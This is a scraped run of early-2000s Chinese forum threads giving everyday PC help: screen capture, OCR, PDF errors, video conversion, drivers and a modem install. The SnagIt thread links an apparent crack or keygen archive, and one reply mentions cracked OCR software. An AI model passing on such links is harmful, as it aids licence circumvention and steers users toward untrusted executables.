注册：2000-08-01
 发表于 2002-01-23 21:39:02 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
to blueonline:
谢谢你的补充

欢迎大家多发点类似的技巧、经验、总结、集锦之类的文章，我想这一方面可以帮助别人，一方面也可以使自己学到更多的东西。对于这些热心的朋友，我们将会尽版主所能对帖子进行打分奖励 。
最后要补充的是如果是引用的文章，请写上出处，这样做也是为了经典论坛好，避免不必要的麻烦，希望大家能理解与合作，谢谢

Blueidea Web Team.
Moderator Of Computer Technology Forum
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:05:45 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
很号

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:23:45 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
啸

你跟我是一天申请的

我才发现

不过分数嘛,差得太远了

呵呵

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:27:56 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
看错了

对不起.错了一格

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:30:03 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
看错了

对不起.错了一格

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
路明

超级用户
积分：406
发帖：128
来自：山东临沂
注册：2002-01-12
 发表于 2002-01-26 10:04:52 按此观看路明的个人资料 该用户不允许显示它的电子邮件 访问路明的主页 路明 的 oicq 是3767454,查看 3767454 的资料 发送悄悄话给路明 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看路明的IP
修改注册表等很麻烦，直接下载一个IE的反修精灵不是更好？
点此下载IE反修精灵

[这消息被路明编辑过(编辑时间2002-01-26 10:08:07)]
[这消息被路明编辑过(编辑时间2002-01-26 10:09:14)]
[这消息被路明编辑过(编辑时间2002-01-26 10:09:14)]

如果说有钱是一种错，我宁愿一错再错，可是现在我没有错。
欢迎访问：好易商务网 好易网站制作论坛 哇哈特效站
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2002-01-28 22:23:09 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
超级好贴!收藏了!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
上一贴 | 下一贴
快速回复 | 主题：IE相关反修改集粹
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


HyperSnap怎么抓取有滚动条的整个窗口？

计算机技术
HyperSnap怎么抓取有滚动条的整个窗口？

上一贴 | 下一贴
发表人 | 主题: HyperSnap怎么抓取有滚动条的整个窗口？
菜菜子 肥皂泡泡 积分：3383 发帖：1620 来自：肥皂泡泡的世界 注册：2000-08-10 | 发表于 2001-11-13 09:29:21 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP 我只能抓全屏，不能抓到下方没有显示出来的部分，怎么做？ :: 落霞与孤骛齐飞，秋水共长天一色。:: --熙宁街43号-- Blueidea Counter Strike Team =Blueidea=Caicaizi
浮云 初级用户 积分：39 发帖：12 来自：上海 注册：2001-09-08 | 发表于 2001-11-13 10:09:14 按此观看浮云的个人资料 按此发邮件给浮云 访问浮云的主页 浮云 的 oicq 是586589,查看 586589 的资料 发送悄悄话给浮云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浮云的IP 打开HyperSnap后，选择需要抓的页面，按下Ctrl+Shift+W后出现下箭头，按左键，OK了。 --------好好学习 天天向上--------
菜菜子 肥皂泡泡 积分：3383 发帖：1620 来自：肥皂泡泡的世界 注册：2000-08-10 | 发表于 2001-11-13 10:38:06 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP THX :: 落霞与孤骛齐飞，秋水共长天一色。:: --熙宁街43号-- Blueidea Counter Strike Team =Blueidea=Caicaizi
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2001-11-14 13:27:25 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 好象还要选中auto scroll的选项吧 Blueidea Web Team. Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：HyperSnap怎么抓取有滚动条的整个窗口？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有什么软件能取出图片中的中英文字吗？

计算机技术
有什么软件能取出图片中的中英文字吗？

上一贴 | 下一贴
发表人 主题: 有什么软件能取出图片中的中英文字吗？
main11

初级用户
积分：46
发帖：14
来自：
注册：2001-12-08
 发表于 2002-01-15 08:48:26 按此观看main11的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给main11 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看main11的IP
我有很多抓屏得来的满是文字的图片，想要图片上的文章，有什么好用的软件吗？我是指获取真正的文字，而非转换过来的字形。
Arken

认真的阿勤
积分：1118
发帖：285
来自：郴州→北京
注册：2000-11-06
 发表于 2002-01-15 08:57:56 按此观看Arken的个人资料 按此发邮件给Arken 发送悄悄话给Arken 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Arken的IP
扫描仪能进行字体识别。
其他的我也不太清楚。

世上无难事，只怕真心人。

I Believe I Can Fly, I Believe I Can Touch The Sky!

redsteps

红烧脚丫
现任版主
积分：2759
发帖：737
来自：济南
注册：2001-03-14
 发表于 2002-01-15 09:21:32 按此观看redsteps的个人资料 按此发邮件给redsteps 访问redsteps的主页 redsteps 的 oicq 是552179,查看 552179 的资料 发送悄悄话给redsteps 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redsteps的IP

引用:

扫描仪能进行字体识别。

确切点说是扫描仪带的OCR软件可以识别，现在绝大多数OCR软件不能脱离硬件用，不过有解密的。
用OCR软件就可以了

www.currentframe.com

Blueidea Web Team
Moderator Of Flash Forum

sares

初级用户
积分：8
发帖：2
来自：
注册：2002-01-15
 发表于 2002-01-15 17:47:34 按此观看sares的个人资料 按此发邮件给sares 访问sares的主页 发送悄悄话给sares 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sares的IP
snapit
or
尚书汉字识别
上一贴 | 下一贴
快速回复 | 主题：有什么软件能取出图片中的中英文字吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


网上down的.pdf文件无法用Acrobat 打开？

计算机技术
网上down的.pdf文件无法用Acrobat 打开？

上一贴 | 下一贴
发表人 | 主题: 网上down的.pdf文件无法用Acrobat 打开？
antimicro 初级用户 积分：6 发帖：3 来自： 注册：2001-11-26 | 发表于 2002-01-16 18:36:45 按此观看antimicro的个人资料 按此发邮件给antimicro 收藏该主题供以后查看 发送悄悄话给antimicro 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看antimicro的IP 网上down下的文件届压缩之后为一系列.pdf文件，但用Acrobat reader打开,没有内容甚至完全不能打开。这到底是为什么？ 错误提示为File dose not begin with '%pdf-'或者A font contains a bad CMap/Encoding 。 请问怎么解决？
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-16 21:11:07 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 从其它网站下载的也有这样的情况？ 可能是下载过程中数据损坏吧 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-01-16 21:49:34 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 有两种可能， 一种是，它在下载的时候，有些没有完全下载下来了，这可以用下载工具来修复一下， 网际快车、netants都有修复损坏的zip功能 另一种可能，就是可供下载的文件，本身就有错误！ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2002-01-17 08:53:03 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 含有中文的pdf文件不能用英文版的Acrobat打开 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2002-01-17 10:25:49 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 我也遇到过这样的情况，我觉得有两种可能，一是pdf本身没做好，所以没法打开，另一个可能是用低版本的Acrobat 打开高版本的pdf，如果是第一种情况就没办法了，如果是第二种情况可以试着用新版本的Acrobat 来打开。（现在比较新的好象是5.0吧，我也不大清楚 [image] ） Blueidea Web Team. Moderator Of Computer Technology Forum
cancan 孤楼寡人 积分：193 发帖：120 来自：shanghai 注册：2001-04-06 | 发表于 2002-01-17 15:55:20 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP 确实是上铺的兄弟说的那个问题，我上个月也遇到过，需要高版本的Acrobat 打开。 我们是这个时代快乐的人质
上一贴 | 下一贴
快速回复 | 主题：网上down的.pdf文件无法用Acrobat 打开？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问: DFI 文件是什么格式?用什么工具打开?

计算机技术
请问: DFI 文件是什么格式?用什么工具打开?

上一贴 | 下一贴
发表人 主题: 请问: DFI 文件是什么格式?用什么工具打开?
叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-20 11:12:48 按此观看叶竟的个人资料 按此发邮件给叶竟 收藏该主题供以后查看 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
怎么这么多的格式
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2002-01-20 11:15:04 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
东方光驱魔术师！

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-20 11:26:49 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
arrive在上个帖子中说
引用:
东方光驱魔术师！

如何打开? 难道还要下载这个"东西"? 天 我的安装多少个程序才够用,
没有别的办法吗? (我指打开这个文件的办法) 我想安装他.

arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2002-01-20 11:32:01 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
导入：
用了就知道了，很简单！

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-20 11:55:35 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
arrive在上个帖子中说
引用:
导入：
用了就知道了，很简单！

三刻有

上一贴 | 下一贴
快速回复 | 主题：请问: DFI 文件是什么格式?用什么工具打开?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何压缩成*.cab格式的文件

计算机技术
如何压缩成*.cab格式的文件

上一贴 | 下一贴
发表人 主题: 如何压缩成*.cab格式的文件
lytkd

终级用户
积分：932
发帖：274
来自：China
注册：2000-12-02
 发表于 2002-01-14 11:47:53 按此观看lytkd的个人资料 按此发邮件给lytkd 收藏该主题供以后查看 发送悄悄话给lytkd 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lytkd的IP
*.cab文件可以用Winzip解开
但如何把一般文件压缩成*.cab格式呢？

流浪的小奀
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-14 17:57:13 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
用winrar吧

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：如何压缩成*.cab格式的文件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样把录像带转换成rm文件？

计算机技术
怎样把录像带转换成rm文件？

上一贴 | 下一贴
发表人 | 主题: 怎样把录像带转换成rm文件？
ajiao 终级用户 积分：544 发帖：172 来自：0412 注册：2001-03-14 | 发表于 2002-01-17 15:23:20 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 领导交待新工作，我什么头绪都没有，只好麻烦大家帮忙了^_^ 1.需要什么型号的录像机，价位 2.听说用视频采集卡，不知道这个卡是装在那里使用的，还是单独一个设备，什么品牌的适合，型号，价位 3.需要用什么软件转换成.rm格式的，比较好用。 到底有没有无需置疑的事情呢？
flashdev 初级用户 积分：29 发帖：14 来自： 注册：2001-12-13 | 发表于 2002-01-17 15:48:57 按此观看flashdev的个人资料 按此发邮件给flashdev 发送悄悄话给flashdev 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flashdev的IP 1.答不上 2.我用的是品尼高，外置设备，感觉还可以。 3.我常用的是：Real Producer（英文）或田雨Real格式压缩至尊（中文） 好好学习，天天向上！
令狐瓜子 9sun 管理员 积分：5449 发帖：1492 来自：南京 注册：2000-07-07 | 发表于 2002-01-20 22:34:49 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP 1，对录像机的要求不高，单放机也成； 2，WINNOV，2000多，内置的视频采集卡； 3，real Procedure plus 独孤八剑 Blueidea Web Team. Moderator Of Flash Forum
上一贴 | 下一贴
快速回复 | 主题：怎样把录像带转换成rm文件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么我得windows media不可以拖进度条

计算机技术
为什么我得windows media不可以拖进度条

上一贴 | 下一贴
发表人 | 主题: 为什么我得windows media不可以拖进度条
西门吹牛 终级用户 积分：692 发帖：281 来自：杭州 注册：2000-09-29 | 发表于 2002-01-22 18:05:35 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 收藏该主题供以后查看 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP 我发现有的影片可以拖进度条,有的不可以是什么原因呢?有办法解决么? 我将一直寻找下去......
ImHow 怎样 积分：2137 发帖：566 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-01-22 19:31:55 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 有的影片要用MediaPlayer6.4才能拖 欲说还休 欲说还休 却道天凉好个秋 唯有不断学习 才能不断进步
未注册 无头版主 现任版主 积分：3176 发帖：893 来自：穷山恶水 注册：2000-06-17 | 发表于 2002-01-22 19:34:09 按此观看未注册的个人资料 按此发邮件给未注册 访问未注册的主页 发送悄悄话给未注册 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看未注册的IP 这个技术我理解是专门为了防止你离线看的，（现在大家把好多线上电影什么的下回来看），所以你下回来的话就不能拖了。 ======================= 到google搜索“快进 asf”就一切搞定了（我以前用过的，现在手里没有了）。 ======================= 可以找到一个专门来播放asf的软件，这个软件是可以拖的，MD是没办法拖了，还有一种方法就是用一个软件将这个文件从新压缩，然后才可以用MD播放的时候拖，这个我也只是知道，但没用过。 ======================= google的一个地址 里面有这样的话的：ASFRecorder. 目前发现的唯一一个可以快进ASF文件的工具，下到了的话，解压后直接用哪个exe的就能用了，（记住先杀一下毒，现在网络不安全） [这消息被未注册编辑过(编辑时间2002-01-22 19:36:09)] 该用户未注册，没有签名。 Blueidea Web Team. Moderator Of Fireworks Forum.
kacji 终级用户 积分：942 发帖：266 来自：活火熔城 注册：2001-08-14 | 发表于 2002-01-24 04:29:16 按此观看kacji的个人资料 按此发邮件给kacji 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP 可以用ASFtool来恢复影片索引。就可以拖了。 大梦谁先觉 平生我自知 草堂春睡足 窗外日迟迟
上一贴 | 下一贴
快速回复 | 主题：为什么我得windows media不可以拖进度条
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


显卡是hp，显示器是dell，装驱动应装hp？

计算机技术
显卡是hp，显示器是dell，装驱动应装hp？

上一贴 | 下一贴
发表人 | 主题: 显卡是hp，显示器是dell，装驱动应装hp？
ajiao 终级用户 积分：544 发帖：172 来自：0412 注册：2001-03-14 | 发表于 2001-12-11 15:45:39 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 已经迷糊了，想不明白了，谢谢了。 到底有没有无需置疑的事情呢？
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-11 17:11:26 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 显示适配器用hp的驱动 显示器类型里面的驱动用dell A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：显卡是hp，显示器是dell，装驱动应装hp？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


声卡爆音吓死人！

计算机技术
声卡爆音吓死人！

上一贴 | 下一贴
发表人 | 主题: 声卡爆音吓死人！
efriend 初级用户 积分：136 发帖：54 来自： 注册：2001-10-01 | 发表于 2001-12-15 13:22:42 按此观看efriend的个人资料 按此发邮件给efriend efriend 的 oicq 是55224321,查看 55224321 的资料 收藏该主题供以后查看 发送悄悄话给efriend 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看efriend的IP 我的机器每次在开机一进入Windows时就有爆音，而且很突然很大声，把我吓死了，怎么解决啊？ 我的机器是WinME Iwill WO2R 带声卡彩卡，加装SB Live!彩卡用主板自带的，声卡用SB Live!但主板上的并没有屏蔽。 Sun
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-15 22:06:25 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 在bois里屏蔽掉，在控制面版把声音改掉 WINDFLASH ::浅紫色FORUM::
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-15 23:05:41 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 如果不屏蔽掉原来的自带的声卡的话。会出现冲突，造成暴音。 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 | 主题：声卡爆音吓死人！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教一下:modern安装

计算机技术
请教一下:modern安装

上一贴 | 下一贴
发表人 | 主题: 请教一下:modern安装
/一般拉傻 高级用户 积分：278 发帖：199 来自：CQ 注册：2001-07-08 | 发表于 2001-12-16 17:47:59 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP 我的机器每次重装后没有办法安装modern的驱动,首先它不会提示找到新硬件,通过设备管理器和控制面板 里的添加新硬件也不行,只有把modern拔掉后再插上,这才会开机时出现提示找到新硬件,才能装好驱动. 另外我发现modern是被装在com4上的,而不是com1或com2.驱动的文件不是那种安装程序,就是几个文件. 不是到那位知道该怎么装而不开机箱? win98,gvc内置. 谢谢 想做一件事 做这件事的益处是显而易见的。 成功后它所来的影响是全世界的历史性进步！ 这里需要强调的是“历史性”三个字！ 那么，这件事是什么呢？ 事成之后即见分晓……
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-16 20:10:48 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 方法一，右点我的电脑，再点设备管理，再点端口，将你的端口1，2改为3，或4，看那个能正常用就用那个 2，在bois里可以设置，具体忘记了：） WINDFLASH ::浅紫色FORUM::
/一般拉傻 高级用户 积分：278 发帖：199 来自：CQ 注册：2001-07-08 | 发表于 2001-12-17 12:35:10 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP 谢 想做一件事 做这件事的益处是显而易见的。 成功后它所来的影响是全世界的历史性进步！ 这里需要强调的是“历史性”三个字！ 那么，这件事是什么呢？ 事成之后即见分晓……
上一贴 | 下一贴
快速回复 | 主题：请教一下:modern安装
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


提示信息

提示信息

帖子不存在.

» 请点击浏览器的后退钮返回.


最佳截屏软件SnagIt 6下载

计算机技术
最佳截屏软件SnagIt 6下载

上一贴 | 下一贴
发表人 | 主题: 最佳截屏软件SnagIt 6下载
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-17 03:28:09 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 收藏该主题供以后查看 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 完整版官方下载地址（3.83M） ftp://ftp.techsmith.com/pub/products/snagit/snagit.exe 一个增强SnagIt功能的工具，使用时上面两栏内容要一致（7K） ftp://211.158.6.15/jiajie/200101/cr-sg511.zip 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：最佳截屏软件SnagIt 6下载
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


最近几天开机是机器出现异响

计算机技术
最近几天开机是机器出现异响

上一贴 | 下一贴
发表人 主题: 最近几天开机是机器出现异响
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-16 17:48:23 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
最近几天开机是机器出现异响,启动完成后就停了,我也不知道到底是什么东西在想,在其他地方也见过这
种情况,想必很多人都遇到过,请告诉一下我怎么办,谢谢.

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
yuzhiqing

终级用户
积分：682
